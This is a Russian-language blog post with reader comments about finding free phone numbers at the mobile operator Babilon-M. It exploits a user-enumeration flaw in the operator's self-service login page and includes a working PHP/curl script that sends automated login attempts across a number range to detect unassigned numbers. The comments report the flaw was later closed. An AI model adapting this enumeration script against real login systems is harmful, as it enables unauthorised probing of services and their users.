Поиск свободных номеров у Babilon-M

Идея этого топика была навеяна периодически возникающими темами на форуме torrents.tj, где люди хотят найти незанятые номера по определённому шаблону. Казалось бы, что здесь сложного, достаточно сходить в абонентский отдел компании и попробовать сделать заказ на номер из будущей номерной ёмкости, и конечно, не за бесплатно. Другим способом является обзвон нужных номеров и попытка договориться о продаже номера с его текущим владельцем.

Но есть и другой путь … найти подходящий номер среди уже имеющихся номерных ёмкостей. Как правило, все мобильные компании чистят свою абонентскую базу. Те абоненты, которые долго не пользуются своим номером и не совершают звонков или не пишут смс, со временем рискуют лишиться номера. Номер уходит в отток, и после вновь возвращается в продажу. Компания Babilon-M всегда была известна тем, что не блокировала неактивных абонентов. Но примерно год назад, Babilon-M изменила стратегию и массовый отток произошёл. Как же можно узнать, какие номера освободились? Нет, нет, родственники, и знакомые в компании нам не потребуются! Всё очень просто и вполне законно! Воспользуемся открытым сервисом – Интернет системой управления услугами!

ИСУУ — Интернет-система управления услугами — это система, посредством которой абоненты получают доступ к широкому спектру услуг. Пользуясь ИСУУ, абоненты могут самостоятельно пополнять счет, переводить средства на другой номер и брать кредит, отправлять SMS-сообщения, отправлять MMS-сообщения, включать и выключать дополнительные услуги.

Чтобы попасть в ИСУУ, надо ввести логин и пароль. Если что-то не так, то система выдаёт ошибку. Так вот! Когда номер выведен в отток, и в биллинговых системах он уже не существует, то ошибка выглядит следующим образом:

номер не принадлежит абоненту сети

ИСУУ Вавилон-М
Т.е., можно найти незанятый номер из старых номерных ёмкостей, никому не мешая и не надоедая звонками. Но что делать дальше? Получится ли его зарегистрировать на себя, это большой вопрос. В любом случае, это уже что-то и с этими номерами вы можете пойти в абонентский отдел, чтобы попробовать их купить.

Есть ещё один момент, очень проблематично сделать проверку номеров вручную, когда нужный вам шаблон номера предполагает очень большой диапазон. Например, как из следующей темы. Необходимо найти свободные номера с окончанием 9090. А это достаточно большая выборка и вручную сидеть над сайтом и вбивать номера сможет только очень терпеливый человек …

Тут нам на помощь приходит какой-нибудь язык программирования. Всё что нам нужно, это просто слать запросы на сайт и обрабатывать результат. Вот такой не хитрый скрипт, позволяет найти номера, оканчивающиеся на 9090, из диапазона номеров от 918209090 до 918999090:

< ?php $url = 'http://iscs.babilon-m.tj/login.aspx'; $cookie='C:\TEMP\cookie.txt'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie); curl_setopt($ch, CURLOPT_FAILONERROR, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_TIMEOUT, 20); $result = curl_exec($ch); curl_close($ch); for($i=2; $i<10; $i++){ for($j=0; $j<10; $j++){ $num="918".$i.$j."9090"; $query="txtNumber=".$num."&txtPassword=test&__VIEWSTATE=/wEPDwUKLTM3ODUwNjU3NWRk7j7Q6bUkaIwRqGBUN3m9HwEe4JU=&__EVENTVALIDATION=/wEWBAK7hIKpDAKvhL6CCwK1qbSRCwKGxZ2yD4yP7gI0YlHSvFdhzEC1Em8NjAaZ&btnRegister=Вход%20в%20систему"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); // set url to post to curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie); curl_setopt($ch, CURLOPT_FAILONERROR, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $query); $result = curl_exec($ch); curl_close($ch); if(strpos($result, "номер не принадлежит абоненту сети")>0)
echo $num."
";
}
}
?>

После выполнения, скрипт выдал следующие номера:

918629090
918769090
918779090

Необходимо учитывать, что выборка производилась в ограниченном диапазоне номеров и только в одной номерной ёмкости – 918. Есть и другие, например 985.

А вывод из всего этого поста следующий, используя бреши в системах различных компаний, можно получать из этих систем информацию, для которой они первоначально не предназначались. Подобные глюки и баги есть не только у Вавилона, но об этом в следующий раз 😉


8 комментариев

  1. пытаюсь проверить на твоем примере номер 918769090… НО вопрос такой — при каких обстоятельствах у тебя получается ответ «номер не принадлежит абоненту сети» ? Открываем ИСУУ — вводим номер — без пароля делаю «Вход в систему» — выдается ошибка «необходимо ввести пароль».
    Ок, вводим произвольный пароль (например 1234), выдается ошибка «введен неверный пароль».

    P/S Заходил с IE8, Mozila FireFox 11

  2. Ну так уже прошло больше месяца со времени написания заметки, ничего удивительного. Либо конкретно эти номера уже расхватали, либо, что более вероятно, админ прикрыл данную брешь. Кстати, админ обещал это сделать, так что возможно этот способ больше не работает.

    1. Ну .. судя по тому, что даже при вводе любого набора цифр, система выдаёт, что пароль неверен, значит закрыли этот баг…. Так обычно и бывает ) В любом случае это не последний баг, есть ещё незакрытые дыры 😉

Добавить комментарий

Ваш e-mail не будет опубликован.